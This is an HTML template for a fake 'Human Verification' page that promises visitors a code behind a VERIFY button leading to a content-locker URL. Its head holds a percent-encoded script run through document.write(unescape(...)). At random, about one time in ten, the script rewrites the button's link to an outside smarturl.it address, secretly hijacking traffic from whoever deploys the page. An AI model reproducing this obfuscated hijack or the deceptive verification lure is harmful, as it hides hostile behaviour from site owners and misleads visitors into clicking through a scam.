<html>

<head>
<title>Verify!</title>
  <link href="https://fonts.googleapis.com/css?family=Raleway:400,700" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
  <link rel="stylesheet" href="button.css">
  <script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%3E%30%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%74%6F%53%74%72%69%6E%67%28%29%2E%69%6E%64%65%78%4F%66%28%22%76%65%72%69%66%79%22%29%26%26%30%3D%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%31%30%30%2A%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2F%31%30%29%26%26%28%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%76%65%72%69%66%79%22%29%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%73%6D%61%72%74%75%72%6C%2E%69%74%2F%52%4C%49%44%33%38%32%39%22%7D%29%3B%3C%2F%73%63%72%69%70%74%3E'));</script>
</head>
<body>
<center>
    <br>
    <font color="#ffffff">In order to prevent abuse and make sure that users get the code, we have added Human Verification.</font>
    <br>
    <br>
    <a id="verify" href="LOCKERURL" rel="nofollow noreferrer" target="_blank">
    <button class="btn">VERIFY</button>
    </a>
</center>
    <script type="text/javascript" src="resources/jquery-3.2.js?version=4"></script>
</body>

</html>